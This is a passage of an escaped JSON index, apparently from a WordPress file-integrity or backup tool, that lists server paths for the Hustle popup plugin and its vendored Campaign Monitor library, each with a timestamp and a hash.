nc\\/hustle-popup-admin-ajax.php\":{\"d\":1534138295,\"h\":\"bd46fd1e8ebad486621b7fae0936597b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-embedded-admin.php\":{\"d\":1534138295,\"h\":\"e3f1fa50a90df9445306e08fe6418f68\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-provider-interface.php\":{\"d\":1534138295,\"h\":\"4d6dc080690e0fda3bd6688d69246049\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-decorator.php\":{\"d\":1534138295,\"h\":\"8127a588e32fbe9eea2718c08ecf3ff0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-dashboard-admin.php\":{\"d\":1534138295,\"h\":\"76a7b36fe24828cfa1be277274d96a93\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-provider-abstract.php\":{\"d\":1534138295,\"h\":\"3df39281e0e08fc2d95fc87bbe5da8f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-settings-admin-ajax.php\":{\"d\":1534138295,\"h\":\"8fa743e51028ae858c189ac6e59ff750\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-wpmudev-api.php\":{\"d\":1534138295,\"h\":\"7fba6d1f3c317f93f2f4960d8c642539\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-custom-content-model.php\":{\"d\":1534138295,\"h\":\"d4ed1d07245fac013ddfcbc29199af37\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-admin.php\":{\"d\":1534138295,\"h\":\"b05bdcd0a0571e2458024ad0450d6ea0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-condition-factory.php\":{\"d\":1534138295,\"h\":\"8095f1be5006a278ce5717332a9a1a2b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-front-ajax.php\":{\"d\":1534138295,\"h\":\"0e0d65d589136950097c5907b4a6e0ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-front-ajax.php\":{\"d\":1534138295,\"h\":\"240d07d87c6979b1800df0df0ab7e234\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-model.php\":{\"d\":1534138295,\"h\":\"684557d7c8dd943ebc0d18f12659fa17\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-model-stats.php\":{\"d\":1534138295,\"h\":\"cce9030f3ec93a420ff949d220063b38\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-widget.php\":{\"d\":1534138295,\"h\":\"9930f321527fbf8d0d6d92be655f8ca7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-data.php\":{\"d\":1534138295,\"h\":\"3c722abdcc5c827ab538590f20652c45\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-migration.php\":{\"d\":1534138295,\"h\":\"5a2d65d775045ad3c57b2872437e48af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-dashboard-data.php\":{\"d\":1534138295,\"h\":\"26b48fc64e6a1060b1e514661bc1b740\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-admin-ajax.php\":{\"d\":1534138295,\"h\":\"ab1804d25d51b80df333949c9f6f61f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-init.php\":{\"d\":1534138295,\"h\":\"dfdfaad8df1e33c9ae8a2681bdd230ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-settings-admin.php\":{\"d\":1534138295,\"h\":\"81ff49e14f806c428abc303c29525133\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-db.php\":{\"d\":1534138295,\"h\":\"83082eaac2c0e58c9176f82da9cbee9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-slidein-admin-ajax.php\":{\"d\":1534138295,\"h\":\"5ca748609d1164c41cfec0e2a6f90910\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-popup-admin.php\":{\"d\":1534138295,\"h\":\"3b5e56795b3b72517e220f34ffeef894\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-sshare-admin.php\":{\"d\":1534138295,\"h\":\"e2df42f1b1bb36cf571c2e7d3227e5fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-sshare-admin-ajax.php\":{\"d\":1534138295,\"h\":\"21ee346b34619f90727181f1614ad0ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-upgrade-free-admin.php\":{\"d\":1534138295,\"h\":\"ba6ac83b6b9c21f619436722b13cdf33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-email-services.php\":{\"d\":1534138295,\"h\":\"c993c6fb55dee4ed4dc21e9633a47fc4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-sshare-model.php\":{\"d\":1534138295,\"h\":\"dfd53248efcde79e387a039e43e0d85e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-utils.php\":{\"d\":1534138295,\"h\":\"f60c77226b4264ae59ab393ebd362aef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-slidein-admin.php\":{\"d\":1534138295,\"h\":\"f11d1feb0602dd77e375098ccb3848d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-widget-legacy.php\":{\"d\":1534138295,\"h\":\"b2706a5a774e36ad6bc2d8ecd0d72c07\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-front.php\":{\"d\":1534138295,\"h\":\"cfced11a8e3d91ddd4f4557cb49c628a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-collection.php\":{\"d\":1534138295,\"h\":\"bf7736f0f41977338c3e0064a50d56e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-geo.php\":{\"d\":1534138295,\"h\":\"edcf2fbc330dd0fc83944b20772a27f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-collection.php\":{\"d\":1534138295,\"h\":\"db333bad13fb9055edc26f10baadfabc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-db.php\":{\"d\":1534138295,\"h\":\"27f85f4cf7e2afaa6eb3283af893b529\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-module-model.php\":{\"d\":1534138295,\"h\":\"0bc18377af8cc17285def5f982365f14\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/hustle-embedded-admin-ajax.php\":{\"d\":1534138295,\"h\":\"ab2560495ea92b7241821828fda5f7c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/inc\\/opt-in-admin.php\":{\"d\":1534138295,\"h\":\"386bf34456b8fba0b1bd1e011a33f02f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/templates.json\":{\"d\":1534138296,\"h\":\"64aca93871da82620071a26c818da4ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_bounces.json\":{\"d\":1534138296,\"h\":\"55471525555dacee6ca1eb9ed5826cea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/timezones.json\":{\"d\":1534138296,\"h\":\"ff9bbd7171fe05f5bace2fc8087953d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/systemdate.json\":{\"d\":1534138296,\"h\":\"5f2f368919effd4c7d36bc11d42d8198\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/unsubscribed_subscribers.json\":{\"d\":1534138296,\"h\":\"0f7cec268e4241426a5c7dcc33ba99eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/import_subscribers_partial_success.json\":{\"d\":1534138296,\"h\":\"4e1ff5c7b33a77d709530a31f544a22d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/suppressionlist.json\":{\"d\":1534138296,\"h\":\"13fff3aeddf64804cf8d9232b79ab45b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_spam.json\":{\"d\":1534138296,\"h\":\"48fa85397d6d8da1a685a94c404d14a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/deleted_subscribers.json\":{\"d\":1534138296,\"h\":\"176235e9b24405ed329cc40a9ac5d1cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_unsubscribes.json\":{\"d\":1534138296,\"h\":\"87d6b967ec28f8b3cd7845acc3ba0a16\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/client_details.json\":{\"d\":1534138296,\"h\":\"964787a45923035cdd7330d4af13dfd9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_list.json\":{\"d\":1534138296,\"h\":\"33b7d284c287fa44edb649234bc2ac6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/subscriber_details.json\":{\"d\":1534138296,\"h\":\"1c5733a762560ed1dc27449edea3c27f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/custom_api_error.json\":{\"d\":1534138296,\"h\":\"6be6c0df48a411fc54a5abf1d8502690\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaigns.json\":{\"d\":1534138296,\"h\":\"3b160d6e1a5de3e6163f2fffa502e4cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/template_details.json\":{\"d\":1534138296,\"h\":\"81fa02e23c0a9c00c55730956a2868b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/add_subscriber.json\":{\"d\":1534138296,\"h\":\"236507977b97832343c87955243068ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_list_webhook.json\":{\"d\":1534138296,\"h\":\"8a1c9ea0268a3a58d8f8fdaa4f159519\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_template.json\":{\"d\":1534138296,\"h\":\"9b1fcc1ae0925bd552cb23e364d48cca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_client.json\":{\"d\":1534138296,\"h\":\"0b5ea68aeecf1f61c8a00fb5d2b89104\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_opens.json\":{\"d\":1534138296,\"h\":\"50c3052eebc922dfd0293498b5374ef0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/import_subscribers.json\":{\"d\":1534138296,\"h\":\"3c7c7d85d510224197dc597d3a6cf585\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/list_stats.json\":{\"d\":1534138296,\"h\":\"b8cd04e30e5e30862f005208997655de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_summary.json\":{\"d\":1534138296,\"h\":\"248d074230990e424dedb26afac895eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/subscriber_history.json\":{\"d\":1534138296,\"h\":\"93d3efaa0f0373156146e9f3060ca855\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_listsandsegments.json\":{\"d\":1534138296,\"h\":\"a0d21dda2042a25b1266036b5d945f0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/countries.json\":{\"d\":1534138296,\"h\":\"7baa975380541216a7829128d4d7fb5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/clients.json\":{\"d\":1534138296,\"h\":\"b243ae5d2f1b0686a6f45bbc262b1ad5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_campaign.json\":{\"d\":1534138296,\"h\":\"61079127bd26d95434347f30803a85b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/oauth_exchange_token.json\":{\"d\":1534138296,\"h\":\"066a7e8a3b3bc58f7b54803f5a16faaa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/list_webhooks.json\":{\"d\":1534138296,\"h\":\"93194d66734e07372cac1b5c9c04f2b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_recipients.json\":{\"d\":1534138296,\"h\":\"be59c57f1f497669260f5124c13d109e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/bounced_subscribers.json\":{\"d\":1534138296,\"h\":\"78c52687485c30c0fb031eb82e472fb3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/drafts.json\":{\"d\":1534138296,\"h\":\"8b36d3bf66ebb683b6926fcef95ae106\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/scheduled.json\":{\"d\":1534138296,\"h\":\"d7c9df96fbfa5bafb1e1cfc0643123b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/campaign_clicks.json\":{\"d\":1534138296,\"h\":\"57d3357f4a0d8b55042a80e6d984e1ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/lists.json\":{\"d\":1534138296,\"h\":\"0b7f8013e3e93a105a7a7d8c156daf4d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/listsforemail.json\":{\"d\":1534138296,\"h\":\"c7eb2e23b02883e0a0f9a9b2ca9bc94a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_custom_field.json\":{\"d\":1534138296,\"h\":\"49b9878fd944fa8ea2f283a3d0b6576b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/apikey.json\":{\"d\":1534138296,\"h\":\"4ca4132cc99f80bfc3d4a029a77a7a6e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/active_subscribers.json\":{\"d\":1534138296,\"h\":\"414033ce6952d88c0edd3c7b04d4f14e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/create_segment.json\":{\"d\":1534138296,\"h\":\"6183146c3898ae281ea640e40fb5b3b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/segment_details.json\":{\"d\":1534138296,\"h\":\"c5e9d05870477f429728463af092ebe5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/list_details.json\":{\"d\":1534138296,\"h\":\"09d06afb7cd013e74fe615ddfd5a6799\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/segment_subscribers.json\":{\"d\":1534138296,\"h\":\"cf5cec4bc4e7970315ea929a0bd29ecd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/segments.json\":{\"d\":1534138296,\"h\":\"d2d9265fd87ed661cd65c9c96b31a2f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/responses\\/custom_fields.json\":{\"d\":1534138296,\"h\":\"fe40aa43df15068516cdc6b7d9e2148c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/class_tests\\/transport_test.php\":{\"d\":1534138296,\"h\":\"910921085e403c42687854589a9fbb40\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/class_tests\\/response_tests.php\":{\"d\":1534138296,\"h\":\"24f3d5b5918455f1020339897e551978\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_template_test.php\":{\"d\":1534138296,\"h\":\"f893021f0ae4245d45862dea2a111d28\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_lists_test.php\":{\"d\":1534138296,\"h\":\"9b86e6dc880510a3cd4db175d745f9c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/all_tests.php\":{\"d\":1534138296,\"h\":\"73120cbcae1b1a1f49b1ea1e0071efee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_segments_test.php\":{\"d\":1534138296,\"h\":\"8ae88771fc932996a5ff4f794351d1a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_administrators_test.php\":{\"d\":1534138296,\"h\":\"a40f3d1b53db27e8cdd29ef1110cd678\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_clients_test.php\":{\"d\":1534138296,\"h\":\"a6e41cc9bb5b2f953cac5412422e1d94\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_subscribers_test.php\":{\"d\":1534138296,\"h\":\"244146c5a8dd8396bbd89bf0c31a0906\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_test.php\":{\"d\":1534138296,\"h\":\"39a8d1e99675b1ebc1633cea546e6f25\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_people_test.php\":{\"d\":1534138296,\"h\":\"e3a06d4691ea848108e995a6b8de9a8a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_campaigns_test.php\":{\"d\":1534138296,\"h\":\"f69ded77fe656a8d795f6780ba43cc55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/tests\\/csrest_events_test.php\":{\"d\":1534138296,\"h\":\"6fac9564a355f6042e7d48297f6b5d2a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/transfer_credits.php\":{\"d\":1534138295,\"h\":\"a9cfdca1becd95c6ebd975058c6055e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_scheduled.php\":{\"d\":1534138295,\"h\":\"bd1fc7c7030264815f262a374ae4dfbc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_drafts.php\":{\"d\":1534138295,\"h\":\"cd154a7dc5a3cbda99e14e4979de18f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/set_payg_billing.php\":{\"d\":1534138295,\"h\":\"77755bd6960a5bc9f0276496a4cb791c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_campaigns.php\":{\"d\":1534138295,\"h\":\"5139c4f763462390ab3648491bc3ce97\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_suppressionlist.php\":{\"d\":1534138295,\"h\":\"314962a3e85372f6bfa2ea4ae35074d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_lists.php\":{\"d\":1534138295,\"h\":\"f8b61e9a7e7244d8d94e283c785c81f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_lists_for_email.php\":{\"d\":1534138295,\"h\":\"91679cf9ccb9815d19cee585e580cf90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/set_basics.php\":{\"d\":1534138295,\"h\":\"98039b7af3faf84b626ee366ad0edeb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_templates.php\":{\"d\":1534138295,\"h\":\"3146ea361fc5be0ae0f8a9821a5feb34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/set_monthly_billing.php\":{\"d\":1534138295,\"h\":\"b67954e6085b6cda0c059a49b18e20a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/suppress.php\":{\"d\":1534138295,\"h\":\"a17c0f81479e6fa64d49976078b9c9ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/unsuppress.php\":{\"d\":1534138295,\"h\":\"b4f1494c81c9869c4961fdfa4733bf70\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/create.php\":{\"d\":1534138295,\"h\":\"d4e34488e72a454d10ae3bc79e8a1852\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/delete.php\":{\"d\":1534138295,\"h\":\"4dfa7fbc0641f4c97c9571c323e01e42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get_segments.php\":{\"d\":1534138295,\"h\":\"9ad7613198b151342d83e8bef874e2d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/client\\/get.php\":{\"d\":1534138295,\"h\":\"e30ff3ec917a1f019cf9319fd80203c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/add_rule.php\":{\"d\":1534138295,\"h\":\"4b87e194823680eeda392a2a12445f36\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/update.php\":{\"d\":1534138295,\"h\":\"201e2cff97af8521d50e001d0d9022a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/get_subscribers.php\":{\"d\":1534138295,\